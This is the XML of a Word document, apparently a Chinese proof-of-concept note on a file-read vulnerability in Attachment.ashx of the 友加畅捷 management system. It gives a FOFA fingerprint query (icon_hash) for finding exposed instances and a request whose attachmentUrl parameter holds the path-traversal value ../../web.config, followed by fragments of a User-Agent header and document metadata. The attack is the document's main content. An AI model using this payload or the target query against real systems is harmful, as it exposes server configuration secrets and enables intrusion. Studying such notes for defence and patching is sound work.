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B3B63">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>友加畅捷管理系统 Attachment.ashx 文件读取漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131692B4"/>
    <w:p w14:paraId="076DD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FOFA：icon_hash="2049187099"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F67EFD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="052CF02F"/>
    <w:p w14:paraId="376D7A65"/>
    <w:p w14:paraId="7A19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EB95A80">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BCD7C4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/Controllers/ajax/Attachment.ashx?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attachmentUrl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../../web.config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904660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bookmarkStart w:id="0" w:name="_GoBack"/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End w:id="0"/>
    </w:p>
    <w:p w14:paraId="4C622B7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455AFA1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44060B5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(X11;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Linux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x86_64)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Chrome/34.0.1847.137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Safari/598.89</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD67285">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F3882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655F7"/>
    <w:rsid w:val="54D3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308</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>325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2025-11-05T02:56:00Z</dcterms:created>
  <dc:creator>m1813</dc:creator>
  <cp:lastModifiedBy>追梦轩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T08:17:03Z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26A0A676E3F14A729C3A540747144A90_12</vt:lpwstr>
  </property>
</Properties>
</file>